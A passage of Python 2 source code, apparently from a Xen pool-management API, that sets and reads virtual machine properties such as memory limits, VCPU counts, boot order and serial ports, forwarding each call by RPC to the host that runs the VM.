eth_num = device[3:]
elif not device :
vif_refs = self._VM_get_VIFs(session, vm_ref).get('Value')
log.debug('vif_refs %s' % vif_refs)
try:
eth_num = str(vif_refs.index(vif_ref))
except:
eth_num = ''
pass
log.debug('eth_num %s' % eth_num)
if other_config and eth_num != '':
rate_list = other_config.get(param_type,{})
log.debug('rate_list %s' % rate_list)
rate = rate_list.get(eth_num,'-1')
return xen_api_success(rate)
except Exception, exn:
log.exception(exn)
return xen_api_success(rate)
def VM_get_domid(self, _, ref):
'''
@author: wuyuewen
@summary: Get VM's id.
@precondition: VM is running.
@param _: session of RPC.
@param ref: uuid
@return: VM's id.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_domid(_, ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_domid', ref)
else:
return self._VM_get_domid(_, ref)
def _VM_get_domid(self, _, ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM's id.
@precondition: VM is running.
@param _: session of RPC.
@param ref: uuid
@return: VM's id.
@rtype: dict.
'''
domid = XendDomain.instance().get_vm_by_uuid(ref).getDomid()
return xen_api_success(domid is None and -1 or domid)
def VM_get_cpu_pool(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
pool_ref = XendCPUPool.query_pool_ref(dom.get_cpu_pool())
return xen_api_success(pool_ref)
def VM_set_pool_name(self, session, vm_ref, value):
'''
@deprecated: not used
'''
return self.VM_set('pool_name', session, vm_ref, value)
def VM_get_is_control_domain(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Check the VM is dom0 or not.
@param session: session of RPC.
@param vm_ref: uuid
@return: True | False.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_is_control_domain(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_get_is_control_domain", vm_ref)
else:
return self._VM_get_is_control_domain(session, vm_ref)
def _VM_get_is_control_domain(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Check the VM is dom0 or not.
@param session: session of RPC.
@param vm_ref: uuid
@return: True | False.
@rtype: dict.
'''
xd = XendDomain.instance()
return xen_api_success(xd.get_vm_by_uuid(vm_ref) == xd.privilegedDomain())
def VM_get_VIF_record(self, session, vm_ref, vif_ref):
'''
@author: wuyuewen
@summary: Get VIF record, this method is a instead of VIF_get_record() use in Pool.
@param session: session of RPC.
@param vm_ref: uuid
@param vif_ref: VIF uuid
@return: VIF record struct.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self.VIF_get_record(session, vif_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VIF_get_record", vif_ref)
else:
return self.VIF_get_record(session, vif_ref)
def VM_get_network_record(self, session, vm_ref, vif):
'''
@author: wuyuewen
@summary: Get network record, this method is a instead of network_get_record() use in Pool.
@param session: session of RPC.
@param vm_ref: uuid
@param vif: VIF uuid
@return: network record struct.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
xenapi = self._get_XendAPI_instance()
bridge = self._VIF_get(vif, "bridge").get('Value')
list_network = xenapi.network_get_by_name_label(session, bridge).get('Value')
if not list_network:
return xen_api_error(['NETWORK_NOT_EXISTS'])
net_ref = list_network[0]
net = XendAPIStore.get(net_ref, "network")
return xen_api_success(net.get_record())
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_get_network_record", vm_ref, vif)
else:
xenapi = self._get_XendAPI_instance()
bridge = self._VIF_get(vif, "bridge").get('Value')
list_network = xenapi.network_get_by_name_label(session, bridge).get('Value')
if not list_network:
return xen_api_error(['NETWORK_NOT_EXISTS'])
net_ref = list_network[0]
net = XendAPIStore.get(net_ref, "network")
return xen_api_success(net.get_record())
def VM_get_VBD_record(self, session, vm_ref, vbd_ref):
'''
@author: wuyuewen
@summary: Get VBD record, this method is a instead of VBD_get_record() use in Pool.
@param session: session of RPC.
@param vm_ref: uuid
@param vbd_ref: VBD uuid
@return: VBD record struct.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self.VBD_get_record(session, vbd_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VBD_get_record", vbd_ref)
else:
return self.VBD_get_record(session, vbd_ref)
def VM_get_system_VDI(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VDI that VM's system VBD linked, VM->VBD(VM's disk)->VDI(Storage management).
@precondition: VM has system VBD device.
@param session: session of RPC.
@param vm_ref: uuid
@return: VDI.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_system_VDI(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_get_system_VDI", vm_ref)
else:
return self._VM_get_system_VDI(session, vm_ref)
def _VM_get_system_VDI(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VDI that VM's system VBD linked, VM->VBD(VM's disk)->VDI(Storage management).
@precondition: VM has system VBD device.
@param session: session of RPC.
@param vm_ref: uuid
@return: VDI.
@rtype: dict.
'''
vbds = self._VM_get_VBDs(session, vm_ref).get('Value', [])
sys_vbd = ''
sys_vdi = ''
if vbds:
for vbd in vbds:
bootable = self.VBD_get_bootable(session, vbd).get('Value', False)
vbd_type = self.VBD_get_type(session, vbd).get('Value', '')
if bootable and cmp(vbd_type, 'Disk') == 0:
sys_vbd = vbd
break
if sys_vbd:
sys_vdi = self.VBD_get_VDI(session, sys_vbd).get('Value', '')
return xen_api_success(sys_vdi)
def VM_set_name_label(self, session, vm_ref, label):
'''
@author: wuyuewen
@summary: Set VM's name label.
@precondition: Only support english, param <label> has no special character except "_" "-" ".".
@param session: session of RPC.
@param vm_ref: uuid
@param label: name label to change.
@return: True | False
@rtype: dict.
@raise xen_api_error: VM error
'''
try:
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
self._VM_set_name_label(session, vm_ref, label)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
xen_rpc_call(remote_ip, 'VM_set_name_label', vm_ref, label)
return xen_api_success_void()
else:
return self._VM_set_name_label(session, vm_ref, label)
except VmError, e:
return xen_api_error(['VM error: ', e])
def _VM_set_name_label(self, session, vm_ref, label):
'''
@author: wuyuewen
@summary: Internal method. Set VM's name label.
@precondition: Only support english, param <label> has no special character except "_" "-" ".".
@param session: session of RPC.
@param vm_ref: uuid
@param label: name label to change.
@return: True | False
@rtype: dict.
@raise xen_api_error: VM error
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
dom.setName(label)
self._VM_save(dom)
return xen_api_success_void()
def VM_set_name_description(self, session, vm_ref, desc):
'''
@author: wuyuewen
@summary: Set VM's name description.
@precondition: Only support english, param <desc> has no special character except "_" "-" ".".
@param session: session of RPC.
@param vm_ref: uuid
@param desc: name description to change.
@return: True | False
@rtype: dict.
@raise xen_api_error: VM error
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_name_description(session, vm_ref, desc)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_name_description', vm_ref, desc)
else:
return self._VM_set_name_description(session, vm_ref, desc)
def _VM_set_name_description(self, session, vm_ref, desc):
'''
@author: wuyuewen
@summary: Internal method. Set VM's name description.
@precondition: Only support english, param <desc> has no special character except "_" "-" ".".
@param session: session of RPC.
@param vm_ref: uuid
@param desc: name description to change.
@return: True | False
@rtype: dict.
@raise xen_api_error: VM error
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
dom.setNameDescription(desc)
self._VM_save(dom)
return xen_api_success_void()
def VM_set_user_version(self, session, vm_ref, ver):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_todo()
def VM_set_is_a_template(self, session, vm_ref, is_template):
'''
@author: wuyuewen
@summary: Change a VM to VM template, or change a VM template to VM.
@precondition: VM not running.
@param session: session of RPC.
@param vm_ref: uuid
@param is_template: True | False
@return: True | False
@rtype: dict.
@raise xen_api_error: VM_BAD_POWER_STATE
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
host_ip = BNPoolAPI.get_host_ip(host_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_is_a_template(session, vm_ref, is_template)
else:
return xen_rpc_call(host_ip, 'VM_set_is_a_template', vm_ref, is_template)
else:
return self._VM_set_is_a_template(session, vm_ref, is_template)
def _VM_set_is_a_template(self, session, vm_ref, is_template):
'''
@author: wuyuewen
@summary: Internal method. Change a VM to VM template, or change a VM template to VM.
@precondition: VM not running.
@param session: session of RPC.
@param vm_ref: uuid
@param is_template: True | False
@return: True | False
@rtype: dict.
@raise xen_api_error: VM_BAD_POWER_STATE
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
if dom._stateGet() == XEN_API_VM_POWER_STATE_RUNNING:
return xen_api_error(
['VM_BAD_POWER_STATE', vm_ref,
XendDomain.POWER_STATE_NAMES[XEN_API_VM_POWER_STATE_RUNNING],
XendDomain.POWER_STATE_NAMES[dom._stateGet()]])
dom.set_is_a_template(is_template)
self.VM_save(dom)
return xen_api_success_void()
# #Mapping intranet ip address to outer net ip address.
# def VM_set_ip_map(self, session, vm_ref, vif):
# if BNPoolAPI._isMaster:
# host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
# if cmp(host_ref, XendNode.instance().uuid) == 0:
# return self._VM_set_ip_map(session, vm_ref, vif)
# else:
# host_ip = BNPoolAPI.get_host_ip(host_ref)
# return xen_rpc_call(host_ip, 'VM_set_ip_map', vm_ref, vif)
# else:
# return self._VM_set_ip_map(session, vm_ref, vif)
#
# def _VM_set_ip_map(self, session, vm_ref, vif):
# mac = None
# mac_rec = self.VIF_get_MAC(session, vif)
# if mac_rec.get('Status') == 'Success':
# mac = mac_rec.get('Value')
# if mac:
# dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
# dom.set_ip_map(mac)
# return xen_api_success(self._VM_save(dom))
# else:
# log.error('Can not get MAC from vif.')
# return xen_api_error(['Get MAC from vif failed!VM:', vm_ref])
# def VM_del_ip_map(self, session, vm_ref, vif):
# if BNPoolAPI._isMaster:
# host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
# if cmp(host_ref, XendNode.instance().uuid) == 0:
# return self._VM_del_ip_map(session, vm_ref, vif)
# else:
# host_ip = BNPoolAPI.get_host_ip(host_ref)
# return xen_rpc_call(host_ip, 'VM_del_ip_map', vm_ref, vif)
# else:
# return self._VM_del_ip_map(session, vm_ref, vif)
#
# def _VM_del_ip_map(self, session, vm_ref, vif):
# mac = None
# mac_rec = self.VIF_get_MAC(session, vif)
# if mac_rec.get('Status') == 'Success':
# mac = mac_rec.get('Value')
# if mac:
# dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
# dom.set_ip_map(mac, True)
# return xen_api_success(self._VM_save(dom))
# else:
# log.error('Can not get MAC from vif.')
# return xen_api_error(['Get MAC from vif failed!VM:', vm_ref])
def VM_set_auto_power_on(self, session, vm_ref, val):
'''
@deprecated: not used
'''
return self.VM_set('auto_power_on', session, vm_ref, val)
def VM_set_memory_dynamic_max(self, session, vm_ref, mem):
'''
@author: wuyuewen
@summary: Set VM's memory dynamic max.
@precondition: VM not running, memory dynamic max > 0, memory dynamic max <= memory static max.
@param session: session of RPC.
@param vm_ref: uuid
@param mem: memory(Bytes)
@return: True | False.
@rtype: dict.
@raise XendConfigError:
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_memory_dynamic_max(session, vm_ref, mem)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_set_memory_dynamic_max', vm_ref, mem)
else:
return self._VM_set_memory_dynamic_max(session, vm_ref, mem)
def _VM_set_memory_dynamic_max(self, session, vm_ref, mem):
'''
@author: wuyuewen
@summary: Internal method. Set VM's memory dynamic max.
@precondition: VM not running, memory dynamic max > 0, memory dynamic max <= memory static max.
@param session: session of RPC.
@param vm_ref: uuid
@param mem: memory(Bytes)
@return: True | False.
@rtype: dict.
@raise XendConfigError:
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
dom.set_memory_dynamic_max(int(mem))
return self._VM_save(dom)
def VM_set_memory_dynamic_min(self, session, vm_ref, mem):
'''
@author: wuyuewen
@summary: Set VM's memory dynamic min.
@precondition: VM not running, memory dynamic min >= memory static min.
@param session: session of RPC.
@param vm_ref: uuid
@param mem: memory(Bytes)
@return: True | False.
@rtype: dict.
@raise XendConfigError:
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_memory_dynamic_min(session, vm_ref, mem)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_set_memory_dynamic_min', vm_ref, mem)
else:
return self._VM_set_memory_dynamic_min(session, vm_ref, mem)
def _VM_set_memory_dynamic_min(self, session, vm_ref, mem):
'''
@author: wuyuewen
@summary: Internal method. Set VM's memory dynamic min.
@precondition: VM not running, memory dynamic min >= memory static min.
@param session: session of RPC.
@param vm_ref: uuid
@param mem: memory(Bytes)
@return: True | False.
@rtype: dict.
@raise XendConfigError:
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
dom.set_memory_dynamic_min(int(mem))
return self._VM_save(dom)
def VM_set_memory_static_max(self, session, vm_ref, mem):
'''
@author: wuyuewen
@summary: Set VM's memory static max.
@precondition: VM not running, memory static max > 0, memory dynamic max <= memory static max.
@param session: session of RPC.
@param vm_ref: uuid
@param mem: memory(Bytes)
@return: True | False.
@rtype: dict.
@raise XendConfigError:
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_memory_static_max(session, vm_ref, mem)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_set_memory_static_max', vm_ref, mem)
else:
return self._VM_set_memory_static_max(session, vm_ref, mem)
def _VM_set_memory_static_max(self, session, vm_ref, mem):
'''
@author: wuyuewen
@summary: Internal method. Set VM's memory static max.
@precondition: VM not running, memory static max > 0, memory dynamic max <= memory static max.
@param session: session of RPC.
@param vm_ref: uuid
@param mem: memory(Bytes)
@return: True | False.
@rtype: dict.
@raise XendConfigError:
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
dom.set_memory_static_max(int(mem))
return self._VM_save(dom)
def VM_set_memory_static_min(self, session, vm_ref, mem):
'''
@author: wuyuewen
@summary: Set VM's memory static min.
@precondition: VM not running, memory dynamic min >= memory static min.
@param session: session of RPC.
@param vm_ref: uuid
@param mem: memory(Bytes)
@return: True | False.
@rtype: dict.
@raise XendConfigError:
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_memory_static_min(session, vm_ref, mem)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_set_memory_static_min', vm_ref, mem)
else:
return self._VM_set_memory_static_min(session, vm_ref, mem)
def _VM_set_memory_static_min(self, session, vm_ref, mem):
'''
@author: wuyuewen
@summary: Internal method. Set VM's memory static min.
@precondition: VM not running, memory dynamic min >= memory static min.
@param session: session of RPC.
@param vm_ref: uuid
@param mem: memory(Bytes)
@return: True | False.
@rtype: dict.
@raise XendConfigError:
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
dom.set_memory_static_min(int(mem))
return self._VM_save(dom)
def VM_set_memory_dynamic_max_live(self, session, vm_ref, mem):
'''
@author: wuyuewen
@summary: Set VM's memory dynamic max when VM is running.
@precondition: memory dynamic max > 0, memory dynamic max <= memory static max.
@param session: session of RPC.
@param vm_ref: uuid
@param mem: memory(Bytes)
@return: True | False.
@rtype: dict.
@raise XendConfigError:
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_memory_dynamic_max_live(session, vm_ref, mem)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_set_memory_dynamic_max_live', vm_ref, mem)
else:
return self._VM_set_memory_dynamic_max_live(session, vm_ref, mem)
def _VM_set_memory_dynamic_max_live(self, session, vm_ref, mem):
'''
@author: wuyuewen
@summary: Internal method. Set VM's memory dynamic max when VM is running.
@precondition: memory dynamic max > 0, memory dynamic max <= memory static max.
@param session: session of RPC.
@param vm_ref: uuid
@param mem: memory(Bytes)
@return: True | False.
@rtype: dict.
@raise XendConfigError:
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
log.debug(int(mem))
dom.set_memory_dynamic_max(int(mem))
# need to pass target as MiB
dom.setMemoryTarget(int(mem)/1024/1024)
return xen_api_success_void()
def VM_set_memory_dynamic_min_live(self, session, vm_ref, mem):
'''
@author: wuyuewen
@summary: Set VM's memory dynamic min when VM is running.
@precondition: memory dynamic min >= memory static min.
@param session: session of RPC.
@param vm_ref: uuid
@param mem: memory(Bytes)
@return: True | False.
@rtype: dict.
@raise XendConfigError:
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_memory_dynamic_min_live(session, vm_ref, mem)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_set_memory_dynamic_min_live', vm_ref, mem)
else:
return self._VM_set_memory_dynamic_min_live(session, vm_ref, mem)
def _VM_set_memory_dynamic_min_live(self, session, vm_ref, mem):
'''
@author: wuyuewen
@summary: Internal method. Set VM's memory dynamic min when VM is running.
@precondition: memory dynamic min >= memory static min.
@param session: session of RPC.
@param vm_ref: uuid
@param mem: memory(Bytes)
@return: True | False.
@rtype: dict.
@raise XendConfigError:
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
dom.set_memory_dynamic_min(int(mem))
# need to pass target as MiB
dom.setMemoryTarget(int(mem) / 1024 / 1024)
return xen_api_success_void()
def VM_set_VCPUs_params(self, session, vm_ref, value):
'''
@deprecated: not used
'''
return self.VM_set('vcpus_params', session, vm_ref, value)
def VM_add_to_VCPUs_params(self, session, vm_ref, key, value):
'''
@deprecated: not used
'''
log.debug('in VM_add_to_VCPUs_params')
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
if 'vcpus_params' not in dom.info:
dom.info['vcpus_params'] = {}
dom.info['vcpus_params'][key] = value
return self._VM_save(dom)
def VM_add_to_VCPUs_params_live(self, session, vm_ref, key, value):
'''
@deprecated: not used
'''
self.VM_add_to_VCPUs_params(session, vm_ref, key, value)
self._VM_VCPUs_params_refresh(vm_ref)
return xen_api_success_void()
def _VM_VCPUs_params_refresh(self, vm_ref):
'''
@deprecated: not used
'''
xendom = XendDomain.instance()
xeninfo = xendom.get_vm_by_uuid(vm_ref)
#update the cpumaps
for key, value in xeninfo.info['vcpus_params'].items():
if key.startswith("cpumap"):
log.debug(key)
if len(key) == 6:
continue
vcpu = int(key[6:])
try:
cpus = map(int, value.split(","))
xendom.domain_pincpu(xeninfo.getDomid(), vcpu, value)
except Exception, ex:
log.exception(ex)
#need to update sched params aswell
if 'weight' in xeninfo.info['vcpus_params'] \
and 'cap' in xeninfo.info['vcpus_params']:
weight = xeninfo.info['vcpus_params']['weight']
xendom.domain_sched_credit_set(xeninfo.getDomid(), weight)
def VM_set_VCPUs_number_live(self, _, vm_ref, num):
'''
@author: wuyuewen
@summary: Set VM's VCPUs number when VM is running.
@precondition: num > 0, num < max_cpu_limit(see /etc/xen/setting).
@param session: session of RPC.
@param vm_ref: uuid
@param num: num of VCPU
@return: True | False.
@rtype: dict.
@raise XendError:
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_VCPUs_number_live(_, vm_ref, num)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_VCPUs_number_live', vm_ref, num)
else:
return self._VM_set_VCPUs_number_live(_, vm_ref, num)
def _VM_set_VCPUs_number_live(self, _, vm_ref, num):
'''
@author: wuyuewen
@summary: Internal method. Set VM's VCPUs number when VM is running.
@precondition: num > 0, num < max_cpu_limit(see /etc/xen/setting).
@param session: session of RPC.
@param vm_ref: uuid
@param num: num of VCPU
@return: True | False.
@rtype: dict.
@raise XendError:
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
dom.setVCpuCount(int(num))
return xen_api_success_void()
def VM_remove_from_VCPUs_params(self, session, vm_ref, key):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
if 'vcpus_params' in dom.info \
and key in dom.info['vcpus_params']:
del dom.info['vcpus_params'][key]
return self._VM_save(dom)
else:
return xen_api_success_void()
def VM_set_VCPUs_at_startup(self, session, vm_ref, num):
'''
@author: wuyuewen
@summary: Set VM's VCPUs when vm startup.
@todo: do not work
@precondition: VM not running, num > 0, num < max_cpu_limit(see /etc/xen/setting).
@param session: session of RPC.
@param vm_ref: uuid
@param num: num of VCPU
@return: True | False.
@rtype: dict.
@raise XendError:
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_VCPUs_at_startup(session, vm_ref, num)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_VCPUs_at_startup', vm_ref, num)
else:
return self._VM_set_VCPUs_at_startup(session, vm_ref, num)
def _VM_set_VCPUs_at_startup(self, session, vm_ref, num):
'''
@author: wuyuewen
@summary: Internal method. Set VM's VCPUs when vm startup.
@todo: do not work
@precondition: VM not running, num > 0, num < max_cpu_limit(see /etc/xen/setting).
@param session: session of RPC.
@param vm_ref: uuid
@param num: num of VCPU
@return: True | False.
@rtype: dict.
@raise XendError:
'''
return self.VM_set('VCPUs_at_startup', session, vm_ref, num)
def VM_set_VCPUs_max(self, session, vm_ref, num):
'''
@author: wuyuewen
@summary: Internal method. Set VM's VCPUs number.
@precondition: VM not running, num > 0, num < max_cpu_limit(see /etc/xen/setting).
@param session: session of RPC.
@param vm_ref: uuid
@param num: num of VCPU
@return: True | False.
@rtype: dict.
@raise XendError:
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_VCPUs_max(session, vm_ref, num)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_VCPUs_max', vm_ref, num)
else:
return self._VM_set_VCPUs_max(session, vm_ref, num)
def _VM_set_VCPUs_max(self, session, vm_ref, num):
'''
@author: wuyuewen
@summary: Internal method. Set VM's VCPUs number.
@precondition: VM not running, num > 0, num < max_cpu_limit(see /etc/xen/setting).
@param session: session of RPC.
@param vm_ref: uuid
@param num: num of VCPU
@return: True | False.
@rtype: dict.
@raise XendError:
'''
dominfo = XendDomain.instance().get_vm_by_uuid(vm_ref)
dominfo.setVCpuCount(int(num))
return xen_api_success_void()
# return self.VM_set('VCPUs_max', session, vm_ref, num)
def VM_set_actions_after_shutdown(self, session, vm_ref, action):
'''
@deprecated: not used
'''
if action not in XEN_API_ON_NORMAL_EXIT:
return xen_api_error(['VM_ON_NORMAL_EXIT_INVALID', vm_ref])
return self.VM_set('actions_after_shutdown', session, vm_ref, action)
def VM_set_actions_after_reboot(self, session, vm_ref, action):
'''
@deprecated: not used
'''
if action not in XEN_API_ON_NORMAL_EXIT:
return xen_api_error(['VM_ON_NORMAL_EXIT_INVALID', vm_ref])
return self.VM_set('actions_after_reboot', session, vm_ref, action)
def VM_set_actions_after_suspend(self, session, vm_ref, action):
'''
@deprecated: not used
'''
if action not in XEN_API_ON_NORMAL_EXIT:
return xen_api_error(['VM_ON_NORMAL_EXIT_INVALID', vm_ref])
return self.VM_set('actions_after_suspend', session, vm_ref, action)
def VM_set_actions_after_crash(self, session, vm_ref, action):
'''
@deprecated: not used
'''
if action not in XEN_API_ON_CRASH_BEHAVIOUR:
return xen_api_error(['VM_ON_CRASH_BEHAVIOUR_INVALID', vm_ref])
return self.VM_set('actions_after_crash', session, vm_ref, action)
# edit by wufan
# value :cd ,boot from disk
# value :dc , boot from cdrom
# change when vm is not running
def VM_set_boot_order(self, session, vm_ref, value):
'''
@author: wuyuewen
@summary: Set VM's boot priority, value=cd means boot from disk, value=dc means boot from cdrom.
@precondition: VM not running.
@param session: session of RPC.
@param vm_ref: uuid
@param value: cd/dc
@return: True | False.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_boot_order(session, vm_ref, value)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_boot_order', vm_ref, value)
else:
return self._VM_set_boot_order(session, vm_ref, value)
def _VM_set_boot_order(self, session, vm_ref, value):
'''
@author: wuyuewen
@summary: Internal method. Set VM's boot priority, value=cd means boot from disk, value=dc means boot from cdrom.
@precondition: VM not running.
@param session: session of RPC.
@param vm_ref: uuid
@param value: cd/dc
@return: True | False.
@rtype: dict.
'''
log.debug('set boot order: %s' % value)
# VM_add_to_HVM_boot_params
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
if 'HVM_boot_params' not in dom.info:
dom.info['HVM_boot_params'] = {}
dom.info['HVM_boot_params']['order'] = value
# VM_add_to_platform
plat = dom.get_platform()
plat['boot'] = value
dom.info['platform'] = plat
# VM_set_HVM_boot_policy
dom.info['HVM_boot_policy'] = 'BIOS order'
return self._VM_save(dom)
# get serial path on host
def VM_get_platform_serial(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get Host TCP port of VM's platform serial.
@param session: session of RPC.
@param vm_ref: uuid
@return: True | False.
@rtype: dict.
'''
log.debug('VM get platform serial')
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_platform_serial(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_platform_serial', vm_ref)
else:
return self._VM_get_platform_serial(session, vm_ref)
# get serial devices in platform
def _VM_get_platform_serial(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get Host TCP port of VM's platform serial.
@param session: session of RPC.
@param vm_ref: uuid
@return: True | False.
@rtype: dict.
'''
# get serial file path
try:
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
plat = dom.get_platform()
value = plat.get('serial')
index = value.find('tcp:127.0.0.1:')
retv = ()
if index != -1:
port = value[index+14:19]
retv = ('127.0.0.1', port)
return xen_api_success(retv)
except Exception, exn:
log.exception(exn)
return xen_api_error('get serial path failed')
# set serial devices in platform
# eg: serial pipe:/tmp/fifotest
def VM_set_platform_serial(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Auto find and set a vailed Host TCP port to VM's platform serial,
the port range is 14000-15000, see PORTS_FOR_SERIAL.
@param session: session of RPC.
@param vm_ref: uuid
@return: True | False.
@rtype: dict.
@raise xen_api_error:
'''
log.debug('VM_set_platform_serial')
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_platform_serial(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_platform_serial', vm_ref)
else:
return self._VM_set_platform_serial(session, vm_ref)
# set serial devices in platform
def _VM_set_platform_serial(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Auto find and set a vailed Host TCP port to VM's platform serial,
the port range is 14000-15000, see PORTS_FOR_SERIAL.
@param session: session of RPC.
@param vm_ref: uuid
@return: True | False.
@rtype: dict.
@raise xen_api_error:
'''
# get serial file path
# save in the same path with boot vbd
try:
xennode = XendNode.instance()
sysvdi_path = xennode.get_sysvdi_path_by_vm(vm_ref)
if sysvdi_path == '':
log.debug('Invalid system vdi path in vm_ref: %s' % vm_ref)
return xen_api_error("Invalid system vdi path")
# file_name = 'pipe.out'
# SERIAL_FILE = "%s/%s" % (sysvdi_path, file_name)
